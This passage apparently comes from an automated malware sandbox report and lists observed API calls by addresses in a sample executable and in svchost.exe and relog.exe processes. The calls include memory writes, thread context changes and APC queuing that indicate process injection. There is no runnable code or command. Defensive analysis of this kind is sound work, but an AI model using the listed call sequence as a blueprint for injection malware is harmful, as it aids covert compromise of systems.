Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03073D10 NtOpenProcessToken,	5_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03073D70 NtOpenThread,	5_2_03073D70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA4340 NtSetContextThread,LdrInitializeThunk,	8_2_02BA4340
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA4650 NtSuspendThread,LdrInitializeThunk,	8_2_02BA4650
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2AF0 NtWriteFile,LdrInitializeThunk,	8_2_02BA2AF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2AD0 NtReadFile,LdrInitializeThunk,	8_2_02BA2AD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2BA0 NtEnumerateValueKey,LdrInitializeThunk,	8_2_02BA2BA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_02BA2BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2BE0 NtQueryValueKey,LdrInitializeThunk,	8_2_02BA2BE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2B60 NtClose,LdrInitializeThunk,	8_2_02BA2B60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2E80 NtReadVirtualMemory,LdrInitializeThunk,	8_2_02BA2E80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2EE0 NtQueueApcThread,LdrInitializeThunk,	8_2_02BA2EE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2FB0 NtResumeThread,LdrInitializeThunk,	8_2_02BA2FB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2FE0 NtCreateFile,LdrInitializeThunk,	8_2_02BA2FE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2F30 NtCreateSection,LdrInitializeThunk,	8_2_02BA2F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_02BA2CA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_02BA2C70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2C60 NtCreateKey,LdrInitializeThunk,	8_2_02BA2C60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_02BA2DF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2DD0 NtDelayExecution,LdrInitializeThunk,	8_2_02BA2DD0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2D30 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_02BA2D30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_02BA2D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA35C0 NtCreateMutant,LdrInitializeThunk,	8_2_02BA35C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA39B0 NtGetContextThread,LdrInitializeThunk,	8_2_02BA39B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2AB0 NtWaitForSingleObject,	8_2_02BA2AB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2B80 NtQueryInformationFile,	8_2_02BA2B80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2EA0 NtAdjustPrivilegesToken,	8_2_02BA2EA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2E30 NtWriteVirtualMemory,	8_2_02BA2E30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2FA0 NtQuerySection,	8_2_02BA2FA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2F90 NtProtectVirtualMemory,	8_2_02BA2F90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2F60 NtCreateProcessEx,	8_2_02BA2F60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2CF0 NtOpenProcess,	8_2_02BA2CF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2CC0 NtQueryVirtualMemory,	8_2_02BA2CC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2C00 NtQueryInformationProcess,	8_2_02BA2C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2DB0 NtEnumerateKey,	8_2_02BA2DB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA2D00 NtSetInformationFile,	8_2_02BA2D00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA3090 NtSetValueKey,	8_2_02BA3090
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA3010 NtOpenDirectoryObject,	8_2_02BA3010
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA3D10 NtOpenProcessToken,	8_2_02BA3D10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA3D70 NtOpenThread,	8_2_02BA3D70
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00158F10 NtCreateFile,	8_2_00158F10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00159080 NtReadFile,	8_2_00159080
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00159170 NtDeleteFile,	8_2_00159170
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00159220 NtClose,	8_2_00159220
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_00159380 NtAllocateVirtualMemory,	8_2_00159380
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_0297F7D8 NtClose,	8_2_0297F7D8

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00F6A1EF

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00F58310

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00F651BD

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F0E6A0	0_2_00F0E6A0
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F2D975	0_2_00F2D975
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F0FCE0	0_2_00F0FCE0
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F221C5	0_2_00F221C5
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F362D2	0_2_00F362D2
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F803DA	0_2_00F803DA
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F3242E	0_2_00F3242E
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F225FA	0_2_00F225FA
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F166E1	0_2_00F166E1
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F5E616	0_2_00F5E616
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F3878F	0_2_00F3878F
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F68889	0_2_00F68889
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F80857	0_2_00F80857
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F36844	0_2_00F36844
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F18808	0_2_00F18808
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F2CB21	0_2_00F2CB21
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F36DB6	0_2_00F36DB6
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F16F9E	0_2_00F16F9E
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F13030	0_2_00F13030
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F2F1D9	0_2_00F2F1D9
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F23187	0_2_00F23187
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F01287	0_2_00F01287
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F21484	0_2_00F21484
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F15520	0_2_00F15520
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F27696	0_2_00F27696
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F15760	0_2_00F15760
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F21978	0_2_00F21978
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F39AB5	0_2_00F39AB5
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F87DDB	0_2_00F87DDB
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F2BDA6	0_2_00F2BDA6
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F21D90	0_2_00F21D90
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F13FE0	0_2_00F13FE0
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F0DF00	0_2_00F0DF00
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_018F62F0	0_2_018F62F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00488393	5_2_00488393
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004710B1	5_2_004710B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0049EAE3	5_2_0049EAE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0047FB93	5_2_0047FB93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00472399	5_2_00472399
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004723A0	5_2_004723A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0047DD93	5_2_0047DD93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00486593	5_2_00486593
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0047FDB3	5_2_0047FDB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0047DEDF	5_2_0047DEDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0047DEE3	5_2_0047DEE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004726E0	5_2_004726E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00472FE0	5_2_00472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FA352	5_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E3F0	5_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_031003E6	5_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0274	5_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C02C0	5_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030100	5_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DA118	5_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C8158	5_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F41A2	5_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_031001AA	5_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F81CC	5_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03064750	5_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303C7C0	5_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305C6E0	5_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040535	5_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03100591	5_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E4420	5_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F2446	5_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EE4F6	5_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FAB40	5_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F6BD7	5_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03056962	5_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0310A9A6	5_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304A840	5_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03042840	5_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030268B8	5_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E8F0	5_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03082F28	5_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03060F30	5_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E2F30	5_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B4F40	5_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BEFA0	5_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03032FC8	5_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304CFE0	5_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FEE26	5_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040E59	5_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03052E90	5_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FCE93	5_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FEEDB	5_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304AD00	5_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DCD1F	5_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03058DBF	5_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303ADE0	5_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040C00	5_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E0CB5	5_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030CF2	5_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F132D	5_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302D34C	5_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0308739A	5_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030452A0	5_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305B2C0	5_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E12ED	5_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0307516C	5_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302F172	5_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0310B16B	5_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304B1B0	5_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EF0CC	5_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030470C0	5_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F70E9	5_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FF0E0	5_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FF7B0	5_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03085630	5_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F16CC	5_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F7571	5_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DD5B0	5_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_031095C3	5_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FF43F	5_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03031460	5_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FFB76	5_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305FB80	5_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B5BF0	5_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0307DBF9	5_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FFA49	5_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F7A46	5_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B3A6C	5_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DDAAC	5_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03085AA0	5_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E1AA3	5_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EDAC6	5_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D5910	5_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03049950	5_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305B950	5_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AD800	5_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030438E0	5_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FFF09	5_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03041F92	5_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FFFB1	5_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03049EB0	5_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03043D40	5_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F1D5A	5_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F7D73	5_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305FDC0	5_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B9C32	5_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FFCF2	5_2_030FFCF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BF02C0	8_2_02BF02C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C10274	8_2_02C10274
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C303E6	8_2_02C303E6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B7E3F0	8_2_02B7E3F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2A352	8_2_02C2A352
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C02000	8_2_02C02000
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C281CC	8_2_02C281CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C241A2	8_2_02C241A2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C301AA	8_2_02C301AA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B60100	8_2_02B60100
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C0A118	8_2_02C0A118
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BF8158	8_2_02BF8158
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B8C6E0	8_2_02B8C6E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B6C7C0	8_2_02B6C7C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B70770	8_2_02B70770
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B94750	8_2_02B94750
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C1E4F6	8_2_02C1E4F6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C22446	8_2_02C22446
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C14420	8_2_02C14420
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C30591	8_2_02C30591
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B70535	8_2_02B70535
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B6EA80	8_2_02B6EA80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C26BD7	8_2_02C26BD7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2AB40	8_2_02C2AB40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B568B8	8_2_02B568B8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B9E8F0	8_2_02B9E8F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B72840	8_2_02B72840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B7A840	8_2_02B7A840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B729A0	8_2_02B729A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C3A9A6	8_2_02C3A9A6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B86962	8_2_02B86962
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2EEDB	8_2_02C2EEDB
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B82E90	8_2_02B82E90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2CE93	8_2_02C2CE93
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2EE26	8_2_02C2EE26
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B70E59	8_2_02B70E59
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BEEFA0	8_2_02BEEFA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B7CFE0	8_2_02B7CFE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B62FC8	8_2_02B62FC8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B90F30	8_2_02B90F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BB2F28	8_2_02BB2F28
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C12F30	8_2_02C12F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BE4F40	8_2_02BE4F40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B60CF2	8_2_02B60CF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C10CB5	8_2_02C10CB5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B70C00	8_2_02B70C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B88DBF	8_2_02B88DBF
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B6ADE0	8_2_02B6ADE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B7AD00	8_2_02B7AD00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C0CD1F	8_2_02C0CD1F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B752A0	8_2_02B752A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C112ED	8_2_02C112ED
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B8B2C0	8_2_02B8B2C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BB739A	8_2_02BB739A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2132D	8_2_02C2132D
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B5D34C	8_2_02B5D34C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C1F0CC	8_2_02C1F0CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2F0E0	8_2_02C2F0E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C270E9	8_2_02C270E9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B770C0	8_2_02B770C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B7B1B0	8_2_02B7B1B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C3B16B	8_2_02C3B16B
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B5F172	8_2_02B5F172
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BA516C	8_2_02BA516C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C216CC	8_2_02C216CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BB5630	8_2_02BB5630
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2F7B0	8_2_02C2F7B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B61460	8_2_02B61460
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2F43F	8_2_02C2F43F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C395C3	8_2_02C395C3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C0D5B0	8_2_02C0D5B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C27571	8_2_02C27571
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C1DAC6	8_2_02C1DAC6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BB5AA0	8_2_02BB5AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C11AA3	8_2_02C11AA3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C0DAAC	8_2_02C0DAAC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C27A46	8_2_02C27A46
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2FA49	8_2_02C2FA49
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BE3A6C	8_2_02BE3A6C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B8FB80	8_2_02B8FB80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BADBF9	8_2_02BADBF9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BE5BF0	8_2_02BE5BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C2FB76	8_2_02C2FB76
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B738E0	8_2_02B738E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02BDD800	8_2_02BDD800
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02C05910	8_2_02C05910
Source: C:\Windows\SysWOW64\relog.exe	Code function: 8_2_02B79950	8_2_02B79950
